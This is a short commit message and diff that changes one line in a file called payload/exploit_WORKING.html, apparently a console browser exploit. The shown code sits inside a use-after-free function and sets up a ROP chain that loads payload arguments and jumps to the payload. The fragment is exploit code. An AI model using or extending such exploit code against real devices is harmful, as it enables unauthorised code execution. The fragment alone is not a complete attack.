32K stack size seems good !

payload/exploit_WORKING.html

@@ -217,7 +217,7 @@ function UaF(a)
 
         //prepare payload argument
         payload_srcaddr = payloadAdress;
-        ROPHEAP = payload_srcaddr + 0x800000;
+        ROPHEAP = payload_srcaddr + _32K;
         ropgen_pop_r24_to_r31(ROP_OSFatal, ROP_Exit, ROP_OSDynLoad_Acquire, ROP_OSDynLoad_FindExport, ROP_os_snprintf, payload_srcaddr, 8, ROPHEAP);//Setup r24..r31 at the time of payload entry. Basically a "paramblk" in the form of registers, since this is the only available way to do this with the ROP-gadgets currently used by this codebase.
 
         //Jump on the payload